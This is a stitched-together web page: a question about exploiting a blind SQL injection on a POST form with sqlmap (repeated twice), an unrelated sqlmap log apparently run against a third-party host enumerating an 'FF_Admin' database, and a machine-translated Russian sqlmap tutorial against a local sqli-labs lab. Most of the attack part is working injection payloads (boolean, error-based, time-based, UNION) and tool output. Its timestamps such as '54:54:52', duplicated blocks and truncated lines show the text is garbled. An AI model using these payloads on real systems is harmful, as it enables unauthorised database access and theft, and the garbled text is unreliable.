For academical purposes I need to explode a blind sql injection on a form paramater which is sent using the POST method. The form is very simple, it just has an input text box where to introduce the name of a user and a submit button, the output produced just informs about the existence or not of the introduced user. The html code is:
<html>
<head>
<title>User info</title>
</head>...
<p> Introduce an user to check if it's in the database </p>
<form method="post">
User <input type="text" value="" name="user">
<input type="submit" value="Check!">
</form>
<hr>
</center>
</html>
I know that ‘guest’ is a valid user name (it returns true) and I’ve checked manually that it’s vulnerable to blind sql injection by introducing guest’ and ‘1’=’1 (which return true), and guest’ and ‘1’ = ‘0, (which returns false). Once being sure that it’s vulnerable I’ve tried to use sqlmap to explode the vulnerability using the following command:
# sqlmap -u "http://foo.com/checkuserform" --method "POST" --data "user=guest" --dbms "mysql" -p "user"
But it seems not being able to explode the vulnerability:
...
**[00:23:01] [WARNING] the web server responded with an HTTP error code (405) which could interfere with the results of the tests**
[00:23:01] [INFO] testing if the target URL is stable
[00:23:02] [INFO] target URL is stable
[00:23:02] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
...
**[00:23:18] [WARNING] POST parameter 'user' is not injectable**
[00:23:18] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[00:23:18] [WARNING] HTTP error codes detected during run:
405 (Method Not Allowed) - 175 times
A part of not being able to explode the vulnerability what surprises me is the HTTP 405 error,since I’ve forced the use of POST in the sqlmap command (and I’m not able to reproduce this error if I check it manually with a browser). I’ve also tried increasing the values of the level and risk parameters without succeed. Do you have any clue why it’s happening?
For academical purposes I need to explode a blind sql injection on a form paramater which is sent using the POST method. The form is very simple, it just has an input text box where to introduce the name of a user and a submit button, the output produced just informs about the existence or not of the introduced user. The html code is:
<html>
<head>
<title>User info</title>
</head>...
<p> Introduce an user to check if it's in the database </p>
<form method="post">
User <input type="text" value="" name="user">
<input type="submit" value="Check!">
</form>
<hr>
</center>
</html>
I know that ‘guest’ is a valid user name (it returns true) and I’ve checked manually that it’s vulnerable to blind sql injection by introducing guest’ and ‘1’=’1 (which return true), and guest’ and ‘1’ = ‘0, (which returns false). Once being sure that it’s vulnerable I’ve tried to use sqlmap to explode the vulnerability using the following command:
# sqlmap -u "http://foo.com/checkuserform" --method "POST" --data "user=guest" --dbms "mysql" -p "user"
But it seems not being able to explode the vulnerability:
...
**[00:23:01] [WARNING] the web server responded with an HTTP error code (405) which could interfere with the results of the tests**
[00:23:01] [INFO] testing if the target URL is stable
[00:23:02] [INFO] target URL is stable
[00:23:02] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
...
**[00:23:18] [WARNING] POST parameter 'user' is not injectable**
[00:23:18] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[00:23:18] [WARNING] HTTP error codes detected during run:
405 (Method Not Allowed) - 175 times
A part of not being able to explode the vulnerability what surprises me is the HTTP 405 error,since I’ve forced the use of POST in the sqlmap command (and I’m not able to reproduce this error if I check it manually with a browser). I’ve also tried increasing the values of the level and risk parameters without succeed. Do you have any clue why it’s happening?
[54:54:52] [DEBUG] cleaning up configuration parameters
[54:54:52] [DEBUG] setting the HTTP timeout
[54:54:52] [DEBUG] setting the HTTP User-Agent header
[54:54:52] [DEBUG] loading random HTTP User-Agent header(s) from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [DEBUG] creating HTTP requests opener object
[54:54:54] [WARNING] it appears that you have provided tainted parameter values (‘id=») with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[54:54:59] [INFO] resuming back-end DBMS ‘microsoft sql server’
[54:54:59] [DEBUG] resolving hostname ‘hoic.org’
[54:55:00] [INFO] testing connection to the target URL
[54:55:00] [DEBUG] declared web page charset ‘iso-8859-1’
[54:55:00] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:00] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘ASPSESSIONIDQCTATTCR=NFPDIAFAEEF…MLJGFMAFKE’). Do you want to use those [Y/n] y
[54:55:05] [DEBUG] resuming NULL connection method ‘HEAD’
sqlmap resumed the following injection point(s) from stored session:
—
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=’;WAITFOR DELAY ‘0:0:5’—
Vector: ;IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF — comment)
Payload: id=’ WAITFOR DELAY ‘0:0:5’—
Vector: IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—
—
[54:55:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
[54:55:05] [INFO] fetching tables for database: FF_Admin
[54:55:05] [INFO] fetching number of tables for database ‘FF_Admin’
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[54:55:08] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) WAITFOR DELAY ‘0:0:5’—
[54:55:08] [WARNING] time-based comparison requires lar[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
. (done)
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>48) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>9) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [INFO] retrieved:
[54:55:16] [DEBUG] performed 3 queries in 10.99 seconds
[54:55:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘—no-cast’ or switch ‘—hex’
[54:55:16] [INFO] resumed: 0
[54:55:16] [DEBUG] performed 0 queries in 0.01 seconds
[54:55:16] [CRITICAL] unable to retrieve the tables for any database
[54:55:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 34 times
Каталог статей
- 1. Оптимизация производительности Sqlmap
- 1. sqlmap устанавливает постоянное HTTP-соединение
- 2. Параметры sqlmap не получают тело HTTP
- 3. sqlmap устанавливает многопоточность
- 4. Оптимизация в один клик
- Два, настраиваемые параметры обнаружения sqlmap
- 1. sqlmap устанавливает уровень обнаружения
- 2. sqlmap устанавливает уровень риска
- Три, инъекция указанного местоположения sqlmap
- 1. в настройках sqlmap указываются параметры инъекции
- -p параметр test:
- — пропустить тест параметров:
- 2. sqlmap устанавливает место для инъекции URI
- Четыре, параметры внедрения sqlmap
- 1. sqlmap обязательная настройка СУБД
- 2. sqlmap принудительно устанавливает систему ОС
- 3. Sqlmap принудительно устанавливает недопустимую замену значения
- параметр —invalid-bignum
- — неверно-логический параметр
- — параметр неверной строки
- 4. Расположение пользовательской загрузки для инъекции Sqlmap
- 5. Скрипт изменения настроек Sqlmap.
- 6. Sqlmap настраивает аутентификацию СУБД.
- Пять, технические параметры внедрения sqlmap
- 1. sqlmap устанавливает определенную технологию SQL-инъекций
- 2. sqlmap устанавливает время задержки слепого впрыска
- 3. sqlmap устанавливает количество полей объединения
- 4. sqlmap устанавливает символ объединения
- 5. sqlmap устанавливает таблицу запросов на объединение
- 6. распознавание отпечатков пальцев sqlmap
1. Оптимизация производительности Sqlmap
1. sqlmap устанавливает постоянное HTTP-соединение
Соединение может быть установлено как постоянное соединение в sqlmap и установлено в сообщении HTTP.connection:keep-alive;
Длинное соединение может снизить накладные расходы на соединение, но потребует ресурсов сервера.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner -v 5
Распечатать
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:06:39 /2020-02-29/
[17:06:39] [DEBUG] cleaning up configuration parameters
[17:06:40] [DEBUG] setting the HTTP timeout
[17:06:40] [DEBUG] setting the HTTP User-Agent header
[17:06:40] [DEBUG] creating HTTP requests opener object
[17:06:40] [INFO] resuming back-end DBMS 'mysql'
[17:06:40] [INFO] testing connection to the target URL
[17:06:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: keep-alive
[17:06:40] [DEBUG] declared web page charset 'utf-8'
[17:06:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:06:40 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0
x71706a7871)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[17:06:40] [INFO] the back-end DBMS is MySQL
[17:06:40] [INFO] fetching banner
[17:06:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:06:40] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:06:40] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 17:06:40 /2020-02-29/
Судя по всему, появилсяKeep-Alive: timeout=5, max=100, Если нет параметров--keep-aliveПоказываетConnection: close。
При использовании постоянного соединения вы не можете установить прокси, иначе возникнут конфликты, например:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner --proxy "http://218.18.158.216:8000" -v 5
Распечатать
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:32 /2020-02-29/
[17:20:32] [DEBUG] cleaning up configuration parameters
[17:20:32] [DEBUG] setting the HTTP timeout
[17:20:32] [DEBUG] setting the HTTP User-Agent header
[17:20:32] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests
[17:20:32] [DEBUG] creating HTTP requests opener object
[17:20:32] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
[17:20:33] [INFO] resuming back-end DBMS 'mysql'
[17:20:33] [INFO] testing connection to the target URL
[17:20:33] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: keep-alive
[17:20:34] [DEBUG] declared web page charset 'utf-8'
[17:20:34] [TRAFFIC IN] HTTP response [#1] (404 Not Found):
Date: Sat, 29 Feb 2020 09:20:33 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Cache: MISS from KX-S42-Web-85
X-Cache-Lookup: MISS from KX-S42-Web-85:3128
Via: 1.0 KX-S42-Web-85 (squid/3.1.23)
Connection: close
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
[17:20:34] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
[17:20:38] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[*] ending @ 17:20:38 /2020-02-29/
дисплейConnection: keep-alive, То есть, если установлен прокси, соединение закрывается, даже если установлено долгое соединение, то есть установлено--keep-aliveнедействительным.
2. Параметры sqlmap не получают тело HTTP
параметр:
--null-connection
Установите пустое соединение в sqlmap, что означает, что тело в HTTP не принимается;
может напрямую получить размер ответа HTTP без получения тела ответа HTTP;
часто используется для слепой инъекции. Отсутствие HTTP Body может снизить потребление пропускной способности сети.
Протестируйте в Kali:
sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --null-connection --banner -v 5
Распечатать
___
__H__
___ ___[']_____ ___ ___ {1.3.8#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:43:01 /2020-02-29/
[17:43:01] [DEBUG] cleaning up configuration parameters
[17:43:01] [DEBUG] setting the HTTP timeout
[17:43:01] [DEBUG] setting the HTTP User-Agent header
[17:43:01] [DEBUG] creating HTTP requests opener object
[17:43:01] [INFO] resuming back-end DBMS 'mysql'
[17:43:01] [INFO] testing connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [DEBUG] declared web page charset 'utf-8'
[17:43:01] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:43:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [INFO] testing NULL connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#2]:
HEAD /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#3]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Accept-encoding: identity
Cache-control: no-cache
Range: bytes=-1
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#3] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#4]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:43:01] [TRAFFIC IN] HTTP response [#4] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
Vector: UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:43:01] [INFO] the back-end DBMS is MySQL
[17:43:01] [INFO] fetching banner
[17:43:01] [DEBUG] resuming configuration option 'string' ('Your')
[17:43:01] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:43:01] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:43:01 /2020-02-29/
3. sqlmap устанавливает многопоточность
параметр:
--thread
sqlmap устанавливает многопоточность, определяющую, сколько HTTP-запросов отправляется одновременно.
Протестируйте в Kali:
qlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner -v 5
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.3.8#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:46:39 /2020-02-29/
[17:46:39] [DEBUG] cleaning up configuration parameters
[17:46:39] [DEBUG] setting the HTTP timeout
[17:46:39] [DEBUG] setting the HTTP User-Agent header
[17:46:39] [DEBUG] creating HTTP requests opener object
[17:46:40] [INFO] resuming back-end DBMS 'mysql'
[17:46:40] [INFO] testing connection to the target URL
[17:46:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close
[17:46:40] [DEBUG] declared web page charset 'utf-8'
[17:46:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:46:39 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
Vector: UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:46:40] [INFO] the back-end DBMS is MySQL
[17:46:40] [INFO] fetching banner
[17:46:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:46:40] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:46:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:46:40] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:46:40 /2020-02-29/
Обнаружение скоро завершится, возможно, из-за наличия кеша./root/.sqlmap/output/192.168.0.103В каталоге удалите и снова проверьте.
qlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner
Распечатать
___
__H__
___ ___["]_____ ___ ___ {1.3.8#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:52:01 /2020-02-29/
[17:52:01] [INFO] testing connection to the target URL
[17:52:01] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:52:01] [INFO] testing if the target URL content is stable
[17:52:02] [INFO] target URL content is stable
[17:52:02] [INFO] testing if GET parameter 'id' is dynamic
[17:52:02] [INFO] GET parameter 'id' appears to be dynamic
[17:52:02] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[17:52:02] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[17:52:02] [INFO] testing for SQL injection on GET parameter 'id'
[17:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'ing provided level (1) and risk (1) values? [Y/n]
[17:52:05] [WARNING] reflective value(s) found and filtering out
[17:52:05] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
